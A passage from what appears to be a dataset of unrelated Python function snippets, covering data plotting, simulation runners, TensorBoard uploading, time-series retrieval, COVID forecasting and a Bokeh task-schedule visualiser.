4.5),\n (now_dt - timedelta(days=1), now_dt, 0, 'Last 24 Hours, Unoccupied', '#FF0000', 'triangle-up', 3),\n (now_dt - timedelta(days=7), now_dt - timedelta(days=1), 1, 'Last 7 Days', '#00CC00', 'circle', 4.5),\n (now_dt - timedelta(days=7), now_dt - timedelta(days=1), 0, 'Last 7 Days, Unoccupied', '#00CC00', 'triangle-up', 3),\n (datetime(1970,1,1), now_dt - timedelta(days=7), 1, '7+ Days Old', '#2f7ed8', 'circle', 4.5),\n (datetime(1970,1,1), now_dt - timedelta(days=7), 0, '7+ Days Old, Unoccupied', '#2f7ed8', 'triangle-up', 3),\n )\n\n for t_start, t_end, occup, ser_name, ser_color, ser_symbol, radius in reversed(ser_params):\n mask = (df_all.index >= t_start) & (df_all.index < t_end) & (df_all.occupied==occup)\n if mask.max():\n series.append( {'x': np.char.mod('%.4g',df_all[mask].X.values).astype(float).tolist(),\n 'y': np.char.mod('%.4g',df_all[mask].Y.values).astype(float).tolist(),\n 'text': df_all[mask].name.values.tolist(),\n 'type': 'scatter',\n 'mode': 'markers', \n 'name': ser_name,\n 'marker': { 'color': ser_color,\n 'symbol': ser_symbol,\n 'size': radius * 2\n }\n } )\n\n # create the X and Y axis labels and the series\n x_label = '%s, %s' % (sensorX.title, sensorX.unit.label)\n y_label = '%s, %s' % (sensorY.title, sensorY.unit.label)\n\n opt = self.get_chart_options('plotly')\n opt['data'] = series\n opt['layout']['title'] = sensorY.title + \" vs. \" + sensorX.title\n opt['layout']['xaxis']['title'] = x_label\n opt['layout']['yaxis']['title'] = y_label\n opt['layout']['legend']['traceorder'] = 'reversed'\n\n html = basechart.chart_config.chart_container_html(opt['layout']['title'])\n\n return {'html': html, 'objects': [('plotly', opt)]}", "def run(self):\n self.timestamp['start'] = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')\n\n for point in self._prepare_grid():\n graph = self._prepare_graph(**point)\n env = self._prepare_env(graph, **point)\n log = self._prepare_logger(graph, env, **point)\n\n try:\n env.run(until=self.runtime)\n except Exception as e:\n print(e)\n log.close()\n\n # self.timestamp[grid.hash_grid_point(point)].append(datetime.datetime.now().strftime('%Y%m%dT%H%M%S'))\n\n self.timestamp['end'] = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')", "def _pre_create_runs_and_time_series(self):\n self._logdir_loader_pre_create.synchronize_runs()\n run_to_events = self._logdir_loader_pre_create.get_run_events()\n if self._run_name_prefix:\n run_to_events = {\n self._run_name_prefix + k: v for k, v in run_to_events.items()\n }\n\n run_names = []\n run_tag_name_to_time_series_proto = {}\n for (run_name, events) in run_to_events.items():\n run_names.append(run_name)\n for event in events:\n _filter_graph_defs(event)\n for value in event.summary.value:\n metadata, is_valid = self._request_sender.get_metadata_and_validate(\n run_name, value\n )\n if not is_valid:\n continue\n if metadata.data_class == summary_pb2.DATA_CLASS_SCALAR:\n value_type = (\n tensorboard_time_series.TensorboardTimeSeries.ValueType.SCALAR\n )\n elif metadata.data_class == summary_pb2.DATA_CLASS_TENSOR:\n value_type = (\n tensorboard_time_series.TensorboardTimeSeries.ValueType.TENSOR\n )\n elif metadata.data_class == summary_pb2.DATA_CLASS_BLOB_SEQUENCE:\n value_type = (\n tensorboard_time_series.TensorboardTimeSeries.ValueType.BLOB_SEQUENCE\n )\n\n run_tag_name_to_time_series_proto[\n (run_name, value.tag)\n ] = tensorboard_time_series.TensorboardTimeSeries(\n display_name=value.tag,\n value_type=value_type,\n plugin_name=metadata.plugin_data.plugin_name,\n plugin_data=metadata.plugin_data.content,\n )\n\n self._one_platform_resource_manager.batch_create_runs(run_names)\n self._one_platform_resource_manager.batch_create_time_series(\n run_tag_name_to_time_series_proto\n )", "def _process_results(self):\n self.portfolio.create_backtest_result_dataframe()\n stats = self._show_stats()\n return stats", "def data_combinator(runs, interval):\n\tagg_data = []\n\tfor run in runs:\n\t\tdata = pc.run_info(pc.combine_info(\"/Users/mchronert/Desktop/activities/\"+run), interval)\n\t\tagg_data += data\n\treturn agg_data", "def create_analysis():\n \n date_now = datetime.now()\n for analysis in Analysis.objects.filter(activated=True):\n\t\n\tif analysis.last_report == None or analysis.last_report <= date_now - timedelta( seconds=PERIOD_CHOICES[analysis.interval]):\n\t \n\t if analysis.last_report != None and analysis.interval == 'n':\n\t\tcontinue\n\t \n\t results = []\n\t for report in analysis.queries.filter(activated=True):\n\t\t\n\t\tif analysis.date_from != None and analysis.date_to != None:\n\t\t report_results = ReportResult.objects.filter(report=report, run_date__lte=analysis.date_to, run_date__gte=analyses.date_from).order_by('run_date') \n\t\telif analysis.date_from == None and analysis.date_to != None:\n\t\t report_results = ReportResult.objects.filter(report=report, run_date__lte=analysis.date_to).order_by('run_date')\n\t\telif analysis.date_from != None and analysis.date_to == None:\n\t\t report_results = ReportResult.objects.filter(report=report, run_date__gte=analyses.date_from).order_by('run_date')\n\t\telse:\n\t\t report_results = ReportResult.objects.filter(report=report).order_by('run_date')\n\t\t\n\t\t# create output from mongo output\n\t\toutput_result = OutputResult(report=report.title)\n\t\toutput_result.date_array = []\n\t\toutput_result.output_array = []\n\t\tprint \"\\n KOLIK: \"+ str(output_result.output_array)\n\t\tfor result in report_results:\n\t\t output_result.date_array.append(result.run_date)\n\t\t #print result.output\n\t\t #print \"\\nouttest: \"+str(output_result.output_array)\n\t\t mongo_output = OutputMongo(result.output)\n\t\t output_result.output_array.append(mongo_output.getoutput())\n\n\t\tprint \"out: \",output_result.output_array\n\t\tresults.append(output_result) \n\n\n\t #print results[0].output_array\n\t #print \"\\n\\n\"\n\t #print results[1].output_array\n\t # process outputs\n\t if not process_output_reports(results, analysis, date_now):\n\t\tprint \"Error in execute analysis: %s\" % (analysis.title)\n\t\tcontinue\n\t \n\t if analysis.interval != 'n':\n\t\tif analysis.date_to != None:\n\t\t analysis.date_to = analysis.date_to + timedelta( seconds=PERIOD_CHOICES[analysis.interval])\n\t\tif analysis.date_from != None:\n\t\t analysis.date_from = analysis.date_from + timedelta( seconds=PERIOD_CHOICES[analysis.interval])\n\t\t \n return True", "def process():", "def tasks(self):\n args = Namespace(rev=self.rev)\n data = run_query('push_results', args)['data']\n\n tasks = []\n for kwargs in data:\n # Do a bit of data sanitization.\n if any(a not in kwargs for a in ('label', 'duration', 'result', 'classification')):\n continue\n\n if kwargs['duration'] <= 0:\n continue\n\n tasks.append(Task(**kwargs))\n\n return tasks", "def retrieve_multiple_time_series(self,run='latest',run_data=None,criteria={},timestep='daily',name_fn=name_element_variable):\n if timestep==\"daily\":\n suffix = \"\"\n else:\n suffix = \"/aggregated/%s\"%timestep\n\n if run_data is None:\n run_data = self.retrieve_run(run)\n\n retrieved={}\n def name_column(result):\n col_name = name_fn(result)\n if col_name in retrieved:\n i = 1\n alt_col_name = '%s %d'%(col_name,i)\n while alt_col_name in retrieved:\n i += 1\n alt_col_name = '%s %d'%(col_name,i)\n col_name = alt_col_name\n return col_name\n\n units_store = {}\n for result in run_data['Results']:\n if self.result_matches_criteria(result,criteria):\n d = self.retrieve_json(result['TimeSeriesUrl']+suffix)\n result.update(d)\n col_name = name_column(result)\n# raise Exception(\"Duplicate column name: %s\"%col_name)\n if 'Events' in d:\n retrieved[col_name] = d['Events']\n units_store[col_name] = result['Units']\n else:\n all_ts = d['TimeSeries']\n for ts in all_ts:\n col_name = name_column(ts)\n units_store[col_name] = ts['Units']\n\n vals = ts['Values']\n s = self.parse_veneer_date(ts['StartDate'])\n e = self.parse_veneer_date(ts['EndDate'])\n if ts['TimeStep']=='Daily':\n f='D'\n elif ts['TimeStep']=='Monthly':\n f='M'\n elif ts['TimeStep']=='Annual':\n f='A'\n dates = pd.date_range(s,e,freq=f)\n retrieved[col_name] = [{'Date':d,'Value':v} for d,v in zip(dates,vals)]\n # Multi Time Series!\n\n result = self._create_timeseries_dataframe(retrieved)\n for k,u in units_store.items():\n result[k].units = u\n\n return result", "def run_methods(self):\n try:\n # dictionaries of population time series\n self.batch_exponential()\n except Exception as e:\n print(str(e))", "def run_all(self):\n return self.final_fof_rdd", "def collect_data(self):\n exp_conf: ec.ExperimentConfiguration\n # Disabled multiprocess run because of huge memory usage\n processes_number = 1 # self._campaign_configuration['General']['j']\n if processes_number == 1:\n self._logger.info(\"-->Evaluate experiments (sequentially)\")\n for exp_conf in tqdm.tqdm(self._exp_confs, dynamic_ncols=True):\n exp_conf.evaluate()\n if bool(self._campaign_configuration['General']['generate_plots']):\n exp_conf.generate_plots()\n self._logger.info(\"<--\")\n else:\n self._logger.info(\"-->Evaluate experiments (in parallel)\")\n pool = multiprocessing.Pool(processes_number)\n self._exp_confs = list(tqdm.tqdm(pool.imap(evaluate_wrapper, self._exp_confs), total=len(self._exp_confs)))\n if bool(self._campaign_configuration['General']['generate_plots']):\n pool = multiprocessing.Pool(processes_number)\n self._exp_confs = list(tqdm.tqdm(pool.imap(plot_wrapper, self._exp_confs), total=len(self._exp_confs)))\n self._logger.info(\"<--\")\n\n self.raw_results = {}\n for exp_conf in self._exp_confs:\n self.raw_results[tuple(exp_conf.get_signature())] = exp_conf.mapes", "def experiment_callback(self, args):\n # If args is None, that means that an exception was raised during the\n # execution of the experiment. In such case, ignore it\n if not args:\n self.n_fail += 1\n return\n # Extract parameters\n params, results, duration = args\n self.n_success += 1\n # Store results\n self.results.add(params, results)\n self.exp_durations.append(duration)\n if self.n_success % self.summary_freq == 0:\n # Number of experiments scheduled to be executed\n n_scheduled = self.n_exp - (self.n_fail + self.n_success)\n # Compute ETA\n n_cores = min(mp.cpu_count(), self.n_proc)\n mean_duration = sum(self.exp_durations) / len(self.exp_durations)\n eta = timestr(n_scheduled * mean_duration / n_cores, False)\n # Print summary\n logger.info('SUMMARY | Completed: %d, Failed: %d, Scheduled: %d, ETA: %s',\n self.n_success, self.n_fail, n_scheduled, eta)", "async def _get_data(self):\n coros = []\n results = []\n for series_ids in self.series_ids:\n response = self._post(data={\"series_id\": series_ids})\n coros.append(response)\n if len(coros) == 5: # throttle at 5\n _ = await asyncio.gather(*coros)\n results.extend(_)\n coros = [] # Reset accumulator\n if coros:\n results.extend(await asyncio.gather(*coros))\n\n return filter(None, results)", "def process(self):", "def process(self):", "def process(self):", "async def wrap_up_processing_reports(self):\n if hasattr(Config(), 'results'):\n new_row = []\n for item in self.recorded_items:\n item_value = {\n 'global_round':\n self.current_global_round,\n 'round':\n self.current_round,\n 'accuracy':\n self.accuracy * 100,\n 'average_accuracy':\n self.average_accuracy * 100,\n 'edge_agg_num':\n Config().algorithm.local_rounds,\n 'local_epoch_num':\n Config().trainer.epochs,\n 'training_time':\n max([\n report.training_time for (report, __) in self.updates\n ]),\n 'round_time':\n time.perf_counter() - self.round_start_time\n }[item]\n new_row.append(item_value)\n\n if Config().is_edge_server():\n result_csv_file = f'{Config().result_dir}result_{Config().args.id}.csv'\n else:\n result_csv_file = f'{Config().result_dir}result.csv'\n\n csv_processor.write_csv(result_csv_file, new_row)\n\n if Config().is_edge_server():\n # When a certain number of aggregations are completed, an edge client\n # needs to be signaled to send a report to the central server\n if self.current_round == Config().algorithm.local_rounds:\n logging.info(\n '[Server #%d] Completed %s rounds of local aggregation.',\n os.getpid(),\n Config().algorithm.local_rounds)\n self.model_aggregated.set()\n\n self.current_round = 0\n self.new_global_round_begins.clear()\n # Wait until a new global round begins\n # to avoid selecting clients before a new global round begins\n await self.new_global_round_begins.wait()", "def postExecution(self):\n\n casalog.origin(\"ParallelDataHelper\") \n if self._msTool:\n self._msTool.close()\n \n # We created a data directory and many SubMSs,\n # now build the reference MS. The outputList is a\n # dictionary of the form:\n # {'path/outputvis.data/SUBMSS/outputvis.0000.ms':True,\n # 'path/outuputvis.data/SUBMSS/outputvis.0001.ms':False}\n outputList = {}\n \n# if (ParallelTaskHelper.getBypassParallelProcessing()==1):\n if (self._cluster == None):\n # This is the list of output SubMSs\n outputList = self._sequential_return_list\n self._sequential_return_list = {}\n elif (self._cluster != None):\n command_response_list = self._cluster.get_command_response(self._command_request_id_list,True,True)\n # Format list in the form of vis dict\n for command_response in command_response_list:\n outvis = command_response['parameters']['outputvis']\n outputList[outvis] = command_response['ret']\n \n \n # List of failed MSs. TBD\n nFailures = []\n \n subMSList = []\n\n nFailures = [v for v in outputList.values() if v == False]\n \n for subMS in outputList:\n # Only use the successful output MSs\n if outputList[subMS]:\n subMSList.append(subMS)\n \n subMSList.sort()\n\n if len(subMSList) == 0:\n casalog.post(\"Error: no subMSs were successfully created.\", 'WARN')\n return False\n \n # When separationaxis='scan' there is no need to give ddistart. \n # The tool looks at the whole spw selection and\n # creates the indices from it. After the indices are worked out, \n # it applies MS selection. We do not need to consolidate either.\n \n # If axis is spw, give a list of the subMSs\n # that need to be consolidated. This list is pre-organized\n # inside the separation functions above.\n \n # Only when input is MS or MS-like and createmms=True\n # Only partition and mstransform have the createmms parameter\n if self._arg.has_key('createmms') and self._arg['createmms'] == True and self._arg['separationaxis'] == 'spw':\n# if (self._arg['separationaxis'] == 'spw' or \n# self._arg['separationaxis'] == 'auto'): \n# if (self._arg['separationaxis'] == 'spw'): \n \n casalog.post('Consolidate the sub-tables')\n \n toUpdateList = self.__ddidict.values()\n \n toUpdateList.sort()\n casalog.post('List to consolidate %s'%toUpdateList,'DEBUG')\n \n # Consolidate the spw sub-tables to take channel selection\n # or averages into account.\n mtlocal1 = mttool()\n try: \n mtlocal1.mergespwtables(toUpdateList)\n mtlocal1.done()\n except Exception, instance:\n mtlocal1.done()\n casalog.post('Cannot consolidate spw sub-tables in MMS','SEVERE')\n return False\n\n if len(nFailures) > 0:\n casalog.post('%s subMSs failed to be created. This is not an error, if due to selection when creating a Multi-MS'%len(nFailures))\n # need to rename/re-index the subMSs\n newList = copy.deepcopy(subMSList)\n idx = 0\n for subms in newList:\n suffix = re.findall(r\".\\d{4}.ms\",subms)\n# newms = subms.rpartition(suffix[-1])[0] \n newms = subms[:-len(suffix[-1])]\n newms = newms+'.%04d.ms'%idx\n os.rename(subms,newms)\n newList[idx] = newms\n idx += 1\n\n \n if len(subMSList) == len(newList):\n subMSList = newList\n \n # Get the first subMS to be the reference when\n # copying the sub-tables to the other subMSs \n mastersubms = subMSList[0]\n\n # Get list of all subtables in a subms\n thesubtables = ph.getSubtables(mastersubms)\n \n # Remove the SOURCE and HISTORY tables, which will be the only copied.\n # All other sub-tables will be linked to first subms\n thesubtables.remove('SOURCE')\n thesubtables.remove('HISTORY')\n\n subtabs_to_omit = thesubtables\n \n # Parallel axis to write to table.info of MMS\n # By default take the one from the input MMS\n parallel_axis = ph.axisType(self.__args['vis'])\n if self._arg.has_key('createmms') and self._arg['createmms'] == True:\n parallel_axis = self._arg['separationaxis']\n\n if parallel_axis == 'auto' or parallel_axis == 'both':\n parallel_axis = 'scan,spw'\n \n # Copy sub-tables from first subMS to the others. The tables in\n # subtabs_to_omit are linked instead of copied.\n casalog.post(\"Finalizing MMS structure\")\n ph.makeMMS(self._arg['outputvis'], subMSList,\n True, # copy subtables (will copy only the SOURCE and HISTORY tables)\n subtabs_to_omit, # omitting these\n parallel_axis\n )\n \n thesubmscontainingdir = os.path.dirname(subMSList[0].rstrip('/'))\n \n shutil.rmtree(thesubmscontainingdir)\n \n # Sanity check on the just created MMS\n # check for broken symlinks\n try:\n with open(os.devnull, 'w') as null:\n p = subprocess.Popen(['find', '-L', self._arg['outputvis'], '-type', 'l'],\n universal_newlines=True, stdout=subprocess.PIPE, stderr=null)\n o, e = p.communicate()\n if o:\n casalog.post('The new MMS contain broken symlinks. Please verify', 'SEVERE')\n casalog.post(o, 'SEVERE')\n return False\n except:\n pass\n\n return True", "def run(self) -> Any:\n self.prepare()\n for step in self.stream:\n self.output = step\n return self.output", "def run_once(self):\n # Track some statistics about artifacts in a summary object.\n summary = collections.Counter()\n\n for source in self.sources:\n # Run the source to collect artifacts.\n self.logger.info(f\"Running source '{source}'\")\n try:\n # get the generator of onions\n onions = self.sources[source].run()\n except Exception as e:\n self.logger.error(e)\n self.logger.error(traceback.print_exc())\n continue\n\n # Process onions with each operator.\n for operator in self.operators:\n self.logger.info(f\"Processing found onions with operator '{operator}'\")\n try:\n self.operators[operator].process(onions)\n # Save the source onion with collected data\n except Exception as e:\n self.logger.error(e)\n self.logger.error(traceback.print_exc())\n continue\n\n\n\n# # Record stats and update the summary.\n# types = artifact_types(doc.get('interestingKeywords'))\n# summary.update(types)\n# for artifact_type in types:\n# self.logger.info(f'types[artifact_type]')\n\n # Log the summary.\n self.logger.info(f\"New artifacts: {dict(summary)}\")", "def run(self, refresh=True):\n\n progress = Progress(\n \"[progress.description]{task.description}\",\n TextColumn(\"[bold green]{task.fields[measures]}\", justify=\"right\"),\n TextColumn(\n \"[dark_goldenrod]Truncated CM {task.fields[conf_matrix]}\",\n justify=\"right\",\n ),\n BarColumn(),\n \"[progress.percentage]{task.percentage:>3.0f}%\",\n TimeRemainingColumn(),\n auto_refresh=False,\n )\n\n logname = self.args.logname\n print(\"Log stored at: \", logname)\n run = wandb.init(\n project=\"information-obfuscation\",\n entity=\"peiyuanl\",\n name=logname,\n config=vars(self.args),\n )\n dirname = os.path.join(\n \"../checkpoints\",\n self.args.experiment,\n self.args.task,\n self.args.model,\n logname,\n )\n Path(dirname).mkdir(parents=True, exist_ok=True)\n\n with progress:\n gender_adv_tasks = []\n age_adv_tasks = []\n occupation_adv_tasks = []\n\n # To ensure layout correctness\n\n gender_task = progress.add_task(\n \"[cyan]Gender Task\",\n total=self.args.num_epochs,\n measures={},\n conf_matrix=[],\n )\n for name in self.get_ordered_adversary_names():\n gender_adv_tasks.append(\n progress.add_task(\n f\"[cyan]Gender {name} Adversary\",\n total=self.args.finetune_epochs,\n measures={},\n conf_matrix=[],\n )\n )\n\n age_task = progress.add_task(\n \"[cyan]Age Task\",\n total=self.args.num_epochs,\n measures={},\n conf_matrix=[],\n )\n for name in self.get_ordered_adversary_names():\n age_adv_tasks.append(\n progress.add_task(\n f\"[cyan]Age {name} Adversary\",\n total=self.args.finetune_epochs,\n measures={},\n conf_matrix=[],\n )\n )\n\n occupation_task = progress.add_task(\n \"[cyan]Occupation Task\",\n total=self.args.num_epochs,\n measures={},\n conf_matrix=[],\n )\n\n for name in self.get_ordered_adversary_names():\n occupation_adv_tasks.append(\n progress.add_task(\n f\"[cyan]Age {name} Adversary\",\n total=self.args.finetune_epochs,\n measures={},\n conf_matrix=[],\n )\n )\n\n self.train_task_with_adversary(\n \"gender\",\n dirname,\n refresh=refresh,\n progress=progress,\n task=gender_task,\n adv_tasks=gender_adv_tasks,\n )\n self.train_task_with_adversary(\n \"age\",\n dirname,\n refresh=refresh,\n progress=progress,\n task=age_task,\n adv_tasks=age_adv_tasks,\n )\n self.train_task_with_adversary(\n \"occupation\",\n dirname,\n refresh=refresh,\n progress=progress,\n task=occupation_task,\n adv_tasks=occupation_adv_tasks,\n )\n\n trained_model_artifact = wandb.Artifact(\n logname + \"_model\", type=\"model\", description=\"Task and adversary models\"\n )\n trained_model_artifact.add_dir(dirname)\n run.log_artifact(trained_model_artifact)\n\n dataset_artifact = wandb.Artifact(\n logname + \"_dataset\",\n type=\"dataset\",\n description=\"Dataset used to train the models\",\n )\n dataset_artifact.add_dir(MOVIELENS_1M_DIR)\n run.log_artifact(dataset_artifact)", "async def run(self):\n\n\t\tawait asyncio.sleep(self.delay)\n\t\tR_load = self.lock.mag/(self.sense - self.lock.mag)*self.R_ref\n\t\tawait self.resistance.push(R_load)\n\t\tawait self.current.push(self.lock.dc/(self.R_ref+R_load))\n\t\tawait self.voltage.push(self.lock.dc*R_load/(self.R_ref+R_load))\n\n\t\tlogger.debug(\"Stream has filled {} of {} points\".format(self.resistance.points_taken,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.resistance.num_points() ))\n\n\t\t#await asyncio.sleep(2*self.integration_time) # Give the filters some time to catch up?", "def add_series_by_search_result(self, result):\n return (yield self.add_series_by_id(result.id))", "def main():\r\n\r\n # Pre-pandemic period\r\n # Step 1 (might take 2-3 mins to categorise 16724 records)\r\n pre = RQ2('../csv_files/precovid_filtered.csv')\r\n pre.cateActions()\r\n\r\n # Step 2\r\n for detail in pre.li_detail[:10]:\r\n print(detail)\r\n plot_lev(pre.od)\r\n\r\n # Step 3\r\n df_new_fixed_pre = manFix(pre.df_new,option='precovid')\r\n\r\n # Step 4 \r\n li_pre_final = cal_group_actions(df_new_fixed_pre,option='precovid')\r\n\r\n # ================================================================\r\n # Post-pandemic period\r\n # Step 1 (might take 2-3 mins to categorise 25827 records)\r\n post = RQ2('../csv_files/postcovid_filtered.csv')\r\n post.cateActions()\r\n\r\n # Step 2 is similar to pre-pandemic period (commented to keep the result clear)\r\n # for detail in post.li_detail[:10]:\r\n # print(detail)\r\n\r\n # Step 3\r\n df_new_fixed_post = manFix(post.df_new, option='postcovid')\r\n\r\n # Step 4 \r\n li_post_final = cal_group_actions(df_new_fixed_post,option='postcovid')\r\n\r\n # ================================================================\r\n # Step 5\r\n meanTest(li_pre_final,li_post_final)\r\n\r\n # Step 6\r\n li_merge = li_pre_final + li_post_final\r\n boxplot(li_merge)", "def run(self):\n # Convert the dataset, index: Recovered, column: log10(Susceptible)\n sr_df = self.sr_df.copy()\n sr_df[self.S] = np.log10(sr_df[self.S].astype(np.float64))\n df = sr_df.pivot_table(index=self.R, values=self.S, aggfunc=\"last\")\n # Convert index to serial numbers\n serial_df = pd.DataFrame(np.arange(1, df.index.max() + 1, 1))\n serial_df.index += 1\n df = pd.merge(\n df, serial_df, left_index=True, right_index=True, how=\"outer\"\n )\n series = df.reset_index(drop=True).iloc[:, 0]\n series = series.interpolate(limit_direction=\"both\")\n # Sampling to reduce run-time of Ruptures\n samples = np.linspace(\n 0, series.index.max(), len(self.sr_df), dtype=np.int64\n )\n series = series[samples]\n # Detection with Ruptures\n algorithm = rpt.Pelt(model=\"rbf\", jump=2, min_size=self.min_size)\n results = algorithm.fit_predict(series.values, pen=0.5)\n # Convert index values to Susceptible values\n reset_series = series.reset_index(drop=True)\n reset_series.index += 1\n susceptible_df = reset_series[results].reset_index()\n # Convert Susceptible values to dates\n df = pd.merge_asof(\n susceptible_df.sort_values(self.S),\n sr_df.reset_index().sort_values(self.S),\n on=self.S, direction=\"nearest\"\n )\n found_list = df[self.DATE].sort_values()[:-1]\n # Only use dates when the previous phase has more than {min_size + 1} days\n delta_days = timedelta(days=self.min_size)\n first_obj = self.to_date_obj(self.dates[0])\n last_obj = self.to_date_obj(self.dates[-1])\n effective_list = [first_obj]\n for found in found_list:\n if effective_list[-1] + delta_days < found:\n effective_list.append(found)\n # The last change date must be under the last date of records {- min_size} days\n if effective_list[-1] >= last_obj - delta_days:\n effective_list = effective_list[:-1]\n # Set change points\n self._change_dates = [\n date.strftime(self.DATE_FORMAT) for date in effective_list[1:]\n ]\n return self", "def main(args):\n ###This Variable declares how many days should be forecasted\n ###And if Plots are shown###################################\n if len(args) > 0 and len(args) < 5:\n FutureCast = int(args[0])\n showAnalyzedData = bool(args[1])\n showForecastPlots = bool(args[2])\n prophetIncluded = bool(args[3])\n else:\n FutureCast = 10\n showAnalyzedData = True\n showForecastPlots = True\n prophetIncluded = True\n ############################################################\n ############################################################\n \n # Window to chose german state to analyze\n window = ControllerMVC()\n state = window.run()\n # Builds Connection to redis server\n try:\n redisDB = RedisClient(_state=state)\n except Exception as generalError:\n print(f\"Somethin went wrong connecting to redis: {generalError}\")\n return\n\n # Fetching data and storing in redis Server\n try:\n redisDB.fillRedisDatabase()\n except Exception as generalError:\n print(f\"Somethin went wrong: {generalError}\")\n return\n \n if showAnalyzedData == True:\n AnObj = AnalyzeCorona(redisDB)\n AnObj.coronaPeaksIncident()\n AnObj.averageCoronaIncident()\n\n HWTitel = \"Holt Winter's Exponenial Smoothing\"\n FFTTitel = \"Fast Fourier Transformation\"\n SARIMATitel = \"SARIMA machine learning\"\n FBProphetTitel = \"FB Prophet Forecast\"\n\n # Create objects and call forecast function\n\n HWObj = HWForecast(redisDB, FutureCast, HWTitel)\n HWObj.getForecast()\n\n fourierTransObj = FourierForecast(redisDB, FutureCast, FFTTitel)\n fourierTransObj.getForecast()\n\n sarimaObj = SARIMAForecast(redisDB, FutureCast, SARIMATitel)\n sarimaObj.getForecast()\n\n if prophetIncluded == True:\n fbProphetObj = FbProphetForecast(redisDB, FutureCast, FBProphetTitel)\n fbProphetObj.getForecast()\n\n if showForecastPlots == True:\n # Create subplots for forecasting methods\n fig, ax = plt.subplots(3)\n HWObj.showResult(ax,0)\n fourierTransObj.showResult(ax,1)\n sarimaObj.showResult(ax,2)\n # To prevent overlaping of titels\n plt.tight_layout()\n plt.show()\n \n ###########################################Unittests Section\n ############################################################ \n testAbstractFr = TestAbstractForecast()\n testAbstractFr.run()\n testRedisCli = TestRedisClient()\n testRedisCli.run()\n ############################################################\n ############################################################ \n #redisDB.flushDB()", "def processData(self):\n recordSet = AresChartsService.toMultiSeries(self.vals, self.chartKeys, self.selectedX , self.chartVals, extKeys=self.extKeys)\n self.aresObj.jsGlobal.add(\"data_%s = %s\" % (self.htmlId, json.dumps(recordSet)))", "def total_fire_power_time_series_par(files, bounding_box):\n \n assert isinstance(bounding_box, BoundingBox)\n bb = bounding_box\n \n results = {}\n with get_context('spawn').Pool() as pool:\n \n vals = pool.map(_process_single_fire_power_time_series, zip(files, itertools.repeat(bb)))\n vals = (val for val in vals if val is not None)\n \n for time, val, fname in vals:\n results[time] = (val, fname)\n \n return results", "def execute_process(self):\n # ciclo con la ejecucion rr para llenar el quantum\n self.execute_until_quantum_is_over()\n\n # gestion de las colas\n if self.execution[\"remainingtime\"] == 0:\n self.queue_done.append(self.execution)", "def run():\n\n import matplotlib.pyplot as plt\n\n anomalies_t = []\n anomalies_v = []\n anomalies_c = []\n\n all_t = []\n all_v = []\n\n rows = []\n for i, row in dataSet.iterrows():\n\n inputData = row.to_dict()\n\n detectorValues = handleRecord(inputData)\n\n if (detectorValues[0] > 0.65):\n anomalies_t.append(inputData[\"timestamp\"])\n anomalies_v.append(inputData[\"value\"])\n anomalies_c.append(detectorValues[0])\n\n all_t.append(inputData[\"timestamp\"])\n all_v.append(inputData[\"value\"])\n\n outputRow = list(row) + list(detectorValues)\n\n rows.append(outputRow)\n\n # Progress report\n if (i % 1000) == 0:\n print \".\",\n sys.stdout.flush()\n\n fig, ax = plt.subplots()\n\n ax.plot(all_t, all_v)\n ax.plot(anomalies_t, anomalies_v, 'ro')\n\n plt.show()\n\n ans = pandas.DataFrame(rows)\n return ans", "def run(self):\n\n def stop(result):\n if isinstance(result, Exception):\n self.error = result\n self.stop()\n #for e in events[0:100]:\n # print(e)\n dt = (self.stopped-self.started)*1000\n print(\"Took {}ms\".format(dt))\n #print(\"Events: {}\").format(len(events))\n if self.profile:\n stats = pstats.Stats(self.profiler)\n for sort in ['tottime','cumtime']:\n stats.sort_stats(sort)\n stats.print_stats(0.1)\n\n self.done.then(stop)\n self.deferred_call(self.show_view)\n self.start()\n if self.error:\n raise self.error", "def visualize(self):\n NUM_AFFINITY = 4\n NUM_WILL = 7\n\n # Colors for the tasks and categories\n COLORS = d3['Category20c'][20] + d3['Category20b'][20]\n COLORS_CAT = d3['Category20'][20]\n COLORS_AFFINITY = brewer['Greens'][NUM_AFFINITY]\n COLORS_WILL = brewer['RdBu'][NUM_WILL]\n\n # Date range for the figure title\n start_str = c.START.strftime(\"%A %m/%d/%y\")\n end_str = c.END.strftime(\"%A %m/%d/%y\")\n\n # Day of week range for the x axis\n start_weekday_str = c.START.strftime(\"%a\")\n end_weekday_str = c.END.strftime(\"%a\")\n\n times, tasks = self.array.nonzero()\n day_start = tutil.DAY_START\n hours = (times % tutil.SLOTS_PER_DAY) / tutil.SLOTS_PER_HOUR\n bottom = day_start + hours\n top = bottom + (0.95 / tutil.SLOTS_PER_HOUR)\n left = np.floor(times / tutil.SLOTS_PER_DAY)\n right = left + 0.75\n chunk_min = [self.task_chunk_min[j] for j in tasks]\n chunk_max = [self.task_chunk_max[j] for j in tasks]\n affinity_cog_task = [self.task_cognitive_load[j] for j in tasks]\n affinity_cog_slot = [c.AFFINITY_COGNITIVE[i] for i in times]\n affinity_cognitive = (np.array(affinity_cog_task) * np.array(\n affinity_cog_slot)).tolist()\n willpower_task = [self.task_willpower_load[j] for j in tasks]\n willpower_cumulative = np.cumsum(willpower_task)\n duration = [self.task_duration[j] for j in tasks]\n duration_realized = [self.task_duration_realized[j] for j in tasks]\n task_names = [self.task_names[j] for j in tasks]\n category_ids = [[l for l, j in enumerate(array) if j != 0] for array in\n [self.task_category[j, :] for j in tasks]]\n category = [\", \".join(\n [self.cat_names[l] for l, j in enumerate(array) if j != 0]) for\n array in [self.task_category[j, :] for j in tasks]]\n data_tooltips = dict(\n chunk_min=chunk_min,\n chunk_max=chunk_max,\n affinity_cognitive=affinity_cognitive,\n affinity_cog_slot=affinity_cog_slot,\n affinity_cog_task=affinity_cog_task,\n willpower_task=willpower_task,\n willpower_cumulative=willpower_cumulative,\n duration=duration,\n duration_realized=duration_realized,\n task_id=tasks,\n task=task_names,\n category=category,\n )\n\n offset = self.num_tasks - self.num_categories\n # Use #deebf7 as placeholder/default event color\n colors = [COLORS[i % len(COLORS)] if i < offset else '#ffffcc' for i in\n tasks]\n data1 = data_tooltips.copy()\n data1.update(dict(\n top=top,\n bottom=bottom,\n left=left,\n right=right,\n colors=colors,\n ))\n source1 = ColumnDataSource(data=data1)\n\n TOOLTIPS = [(\"task\", \"@task\"),\n (\"category\", \"@category\"),\n (\"duration\", \"@duration_realized / @duration\"),\n (\"willpower\", \"@willpower_task\"),\n (\"willpower (cum)\", \"@willpower_cumulative\"),\n (\"chunk_range\", \"(@chunk_min, @chunk_max)\"),\n (\"affinity [slot x task]\", 